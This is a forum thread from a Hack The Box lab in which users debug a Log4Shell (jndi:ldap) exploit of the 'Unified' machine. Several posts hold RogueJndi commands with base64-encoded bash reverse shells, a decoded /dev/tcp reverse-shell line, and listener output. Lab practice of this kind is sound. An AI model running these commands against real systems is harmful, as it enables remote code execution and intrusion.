Starting Point : Unified : Can't get reverse shell with Netcat or Meterpreter

HTB Content
, , ,
1

So I’ve been working on this machine for 2 days now (sad right?) and I can’t seem to figure out what on Earth I’m doing wrong. I’m even using the walkthrough!

I’m at the point where the jndi:ldap command is sent from burpsuite, then RogueJndi is supposed to send the payload if I’m not mistaken. Netcat picks it up but immediately closes the connection. Same with metasploit and meterpreter.

I genuinely don’t even know where to begin with this. I’m using Kali on a Google Cloud server, I’ve upgraded it from a standard deb distro by adding the gpg key and updating the sources.list.

Back to the problem at hand it just seems strange that both netcat and meterpreter can’t keep the connection open. I read somewhere that netcat can’t handle payloads but if that’s true then why would the walkthrough instruct you to use a payload with netcat?

Any advice is appreciated, I feel like a moron. Let me know if there are any outputs you’d like to see:

Net cat
cloz@kalistance:~/Documents/HackTheBox/StartingPoint/Unified$ sudo nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.129.91.152 44328
cloz@kalistance:~/Documents/HackTheBox/StartingPoint/Unified$

Meterpreter:
[] Started reverse TCP handler on 10.10.15.253:4444
[] Sending stage (175686 bytes) to 10.129.91.152
[] - Meterpreter session 1 closed. Reason: Died
[-] Meterpreter session 1 is not valid and will be closed
[] Sending stage (175686 bytes) to 10.129.91.152
[-] Meterpreter session 2 is not valid and will be closed
[*] - Meterpreter session 2 closed.

1 Like
2

when you copy and paste from the example

image
image902×192 21.5 KB

it will put the {base64, -d} on a third line like this
image
image1968×158 76.9 KB

put the curser in front of {base64, -d} and hit backspace to make it go back to 2 lines. It should look like this
image
image3052×102 70.3 KB

4 Likes
3

thx

4

I fixed it, it was in the backspace, for example :

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjA2LzQ0MyAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "YOUR IP TUN0"
2 Likes
5

i hv tried everything, i cant figureout whats wrong
my tunnel ip is 10.10.15.208

utun6: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1500
	inet 10.10.15.208 --> 10.10.15.208 netmask 0xfffffe00
	inet6 fe80::b2be:83ff:fe02:87b3%utun6 prefixlen 64 scopeid 0x15 
	inet6 dead:beef:2::11ce prefixlen 64 
	nd6 options=201<PERFORMNUD,DAD>

i started server with this

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMjA4LzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "{10.10.15.208}"

base64 decoded string is

bash -c bash -i >&/dev/tcp/10.10.15.208/4444 0>&1

server is working just fine

image
image2086×934 151 KB

i sent request like this
still failing to receive request since past few hours